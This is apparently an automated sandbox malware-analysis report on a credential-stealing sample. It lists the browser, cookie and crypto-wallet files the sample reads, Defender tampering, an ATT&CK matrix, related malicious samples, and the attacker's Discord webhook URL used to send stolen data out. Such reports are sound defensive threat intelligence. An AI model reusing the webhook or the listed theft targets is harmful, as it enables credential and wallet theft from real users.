                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: Yara matchFile source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2084370942.000002B9B713F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2086197806.000002B9B98BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2086727493.000002B9B99E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.2081920578.000002B9BA2AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key, type: DROPPED
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C2B5D bind,WSAGetLastError,5_2_00007FFDF10C2B5D
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                File and Directory Permissions Modification
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                Data Encrypted for Impact
                CredentialsDomainsDefault Accounts2
                Native API
                11
                Windows Service
                11
                Windows Service
                4
                Disable or Modify Tools
                LSASS Memory3
                File and Directory Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts222
                Command and Scripting Interpreter
                Logon Script (Windows)112
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                Security Account Manager247
                System Information Discovery
                SMB/Windows Admin Shares1
                Clipboard Data
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                Service Execution
                Login HookLogin Hook31
                Obfuscated Files or Information
                NTDS891
                Security Software Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon ScriptNetwork Logon Script121
                Software Packing
                LSA Secrets3
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Timestomp
                Cached Domain Credentials371
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                File Deletion
                Proc Filesystem1
                Remote System Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                Masquerading
                /etc/passwd and /etc/shadow1
                System Network Configuration Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Modify Registry
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd371
                Virtualization/Sandbox Evasion
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task112
                Process Injection
                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585573 Sample: 47SXvEQ.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 105 ip-api.com 2->105 107 discord.com 2->107 109 blank-16pis.in 2->109 131 Antivirus / Scanner detection for submitted sample 2->131 133 Sigma detected: Capture Wi-Fi password 2->133 135 Multi AV Scanner detection for submitted file 2->135 137 18 other signatures 2->137 11 47SXvEQ.exe 10 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 file5 99 C:\Users\user\AppData\Local\...\instals.exe, PE32+ 11->99 dropped 101 C:\Users\user\AppData\Local\Temp\Built.exe, PE32+ 11->101 dropped 163 Detected unpacking (changes PE section rights) 11->163 165 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->165 167 Tries to evade debugger and weak emulator (self modifying code) 11->167 175 5 other signatures 11->175 17 Built.exe 22 11->17         started        21 instals.exe 1 1 11->21         started        103 C:\Windows\Temp\qnibnfgnagzt.sys, PE32+ 15->103 dropped 169 Modifies the context of a thread in another process (thread injection) 15->169 171 Adds a directory exclusion to Windows Defender 15->171 173 Sample is not signed and drops a device driver 15->173 23 powershell.exe 15->23         started        signatures6 process7 file8 87 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 17->87 dropped 89 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 17->89 dropped 91 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 17->91 dropped 95 16 other files (none is malicious) 17->95 dropped 115 Modifies Windows Defender protection settings 17->115 117 Adds a directory exclusion to Windows Defender 17->117 119 Tries to harvest and steal WLAN passwords 17->119 129 2 other signatures 17->129 25 Built.exe 1 88 17->25         started        93 C:\ProgramData\Microsoft\svchost.exe, PE32+ 21->93 dropped 121 Uses powercfg.exe to modify the power settings 21->121 123 Drops PE files with benign system names 21->123 125 Modifies power options to not sleep / hibernate 21->125 29 powershell.exe 23 21->29         started        31 cmd.exe 21->31         started        33 sc.exe 21->33         started        39 12 other processes 21->39 127 Loading BitLocker PowerShell Module 23->127 35 conhost.exe 23->35         started        37 Conhost.exe 23->37         started        signatures9 process10 dnsIp11 111 ip-api.com 208.95.112.1, 49731, 49740, 80 TUT-ASUS United States 25->111 113 discord.com 162.159.135.232, 443, 49741 CLOUDFLARENETUS United States 25->113 153 Tries to harvest and steal browser information (history, passwords, etc) 25->153 155 Modifies Windows Defender protection settings 25->155 157 Modifies the hosts file 25->157 161 5 other signatures 25->161 41 cmd.exe 25->41         started        44 cmd.exe 25->44         started        46 cmd.exe 25->46         started        56 22 other processes 25->56 159 Loading BitLocker PowerShell Module 29->159 48 conhost.exe 29->48         started        50 conhost.exe 31->50         started        52 wusa.exe 31->52         started        54 conhost.exe 33->54         started        58 11 other processes 39->58 signatures12 process13 signatures14 139 Uses cmd line tools excessively to alter registry or file data 41->139 141 Encrypted powershell cmdline option found 41->141 143 Bypasses PowerShell execution policy 41->143 151 3 other signatures 41->151 60 powershell.exe 41->60         started        63 conhost.exe 41->63         started        145 Modifies Windows Defender protection settings 44->145 147 Removes signatures from Windows Defender 44->147 65 powershell.exe 44->65         started        76 2 other processes 44->76 67 powershell.exe 46->67         started        70 conhost.exe 46->70         started        149 Tries to harvest and steal WLAN passwords 56->149 72 systeminfo.exe 56->72         started        74 conhost.exe 56->74         started        78 39 other processes 56->78 process15 file16 177 Loading BitLocker PowerShell Module 60->177 97 C:\Users\user\AppData\...\sywb4geu.cmdline, Unicode 67->97 dropped 80 csc.exe 67->80         started        179 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 72->179 83 Conhost.exe 74->83         started        signatures17 process18 file19 85 C:\Users\user\AppData\Local\...\sywb4geu.dll, PE32 80->85 dropped

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                47SXvEQ.exe21%ReversingLabsWin32.Trojan.Generic
                47SXvEQ.exe100%AviraTR/Crypt.TPM.Gen
                47SXvEQ.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_decimal.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\libcrypto-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\libffi-7.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\libssl-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\rar.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\sqlite3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pyd0%ReversingLabs
                C:\Windows\Temp\qnibnfgnagzt.sys5%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                discord.com
                162.159.135.232
                truefalse
                  high
                  ip-api.com
                  208.95.112.1
                  truefalse
                    high
                    blank-16pis.in
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://discord.com/api/webhooks/1319333831601422477/Gz1lBx-zJ-f6c5VmTw7-Emfjq_tqsL0pI1D5turBQtQOU8FjLlkxesj3qj89-C61Kjsefalse
                        high
                        http://ip-api.com/json/?fields=225545false
                          high
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sBuilt.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://sectigo.com/CPS0Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://crl.thawte.com/ThawteTimestampingCA.crl0Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.sectigo.com0Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsp.thawte.com0Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        208.95.112.1
                                        ip-api.comUnited States
                                        53334TUT-ASUSfalse
                                        162.159.135.232
                                        discord.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1585573
                                        Start date and time:2025-01-07 21:00:10 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 12m 4s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:126
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:47SXvEQ.exe
                                        Detection:MAL
                                        Classification:mal100.rans.troj.adwa.spyw.expl.evad.mine.winEXE@207/55@4/2
                                        EGA Information:
                                        • Successful, ratio: 28.6%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Stop behavior analysis, all processes terminated
                                        • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe, WmiPrvSE.exe
                                        • Excluded IPs from analysis (whitelisted): 216.58.206.35, 52.149.20.212, 20.12.23.50, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target 47SXvEQ.exe, PID 6956 because it is empty
                                        • Execution Graph export aborted for target instals.exe, PID 3716 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 2944 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7092 because it is empty
                                        • Execution Graph export aborted for target svchost.exe, PID 6024 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: 47SXvEQ.exe
                                        TimeTypeDescription
                                        15:01:03API Interceptor1x Sleep call for process: instals.exe modified
                                        15:01:05API Interceptor146x Sleep call for process: powershell.exe modified
                                        15:01:07API Interceptor4x Sleep call for process: WMIC.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        208.95.112.1test.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                        • ip-api.com/json/
                                        HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                        • ip-api.com/line/?fields=hosting
                                        1.exeGet hashmaliciousUnknownBrowse
                                        • ip-api.com/json/?fields=hosting,query
                                        1.exeGet hashmaliciousUnknownBrowse
                                        • ip-api.com/json/?fields=hosting,query
                                        YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                        • ip-api.com/line/?fields=hosting
                                        SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        Resource.exeGet hashmaliciousBlank GrabberBrowse
                                        • ip-api.com/json/?fields=225545
                                        P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                        • ip-api.com/line/?fields=hosting
                                        BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                        • ip-api.com/line/?fields=hosting
                                        SharkHack.exeGet hashmaliciousXWormBrowse
                                        • ip-api.com/line/?fields=hosting
                                        162.159.135.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                        • discord.com/admin.php
                                        18561381.exeGet hashmaliciousRedLineBrowse
                                        • discord.com/channels/948610961449816084/948610961449816086/948611091527774228
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        discord.comP3A946MOFP.exeGet hashmaliciousXWormBrowse
                                        • 162.159.128.233
                                        paint.exeGet hashmaliciousBlank GrabberBrowse
                                        • 162.159.137.232
                                        hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                        • 162.159.137.232
                                        X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                        • 162.159.137.232
                                        KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                        • 162.159.137.232
                                        9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                        • 162.159.137.232
                                        riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                        • 162.159.138.232
                                        AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                        • 162.159.128.233
                                        rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                        • 162.159.137.232
                                        Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                        • 162.159.138.232
                                        ip-api.comtest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                        • 208.95.112.1
                                        HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                        • 208.95.112.1
                                        1.exeGet hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        1.exeGet hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Resource.exeGet hashmaliciousBlank GrabberBrowse
                                        • 208.95.112.1
                                        P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        SharkHack.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUSQoRXFaE8Xn.exeGet hashmaliciousDCRatBrowse
                                        • 188.114.96.3
                                        https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                        • 104.18.11.207
                                        https://us01-i-prod-estimating-storage.s3.amazonaws.com/598134325679181/562949954787293/Documents/1706942/Hoosier%20Crane%20Service%20Company.pdfGet hashmaliciousHTMLPhisherBrowse
                                        • 104.18.11.207
                                        https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                        • 104.17.223.152
                                        http://xyft.zmdusdxj.ruGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        01-06-2025 Docu.invpd (1).pdfGet hashmaliciousHTMLPhisherBrowse
                                        • 172.67.179.163
                                        https://creditunions.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                                        • 172.67.74.23
                                        TUT-ASUStest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                        • 208.95.112.1
                                        HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                        • 208.95.112.1
                                        1.exeGet hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        1.exeGet hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Resource.exeGet hashmaliciousBlank GrabberBrowse
                                        • 208.95.112.1
                                        P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        SharkHack.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dllLEmcGUQfA7.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                            Fi3ptS6O8D.exeGet hashmaliciousAmadeyBrowse
                                              test.exeGet hashmaliciousUnknownBrowse
                                                random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                  V2s8yjvIJw.exeGet hashmaliciousIris StealerBrowse
                                                    1A70mZfanW.exeGet hashmaliciousUnknownBrowse
                                                      Ei5hvT55El.exeGet hashmaliciousUnknownBrowse
                                                        roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                          roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
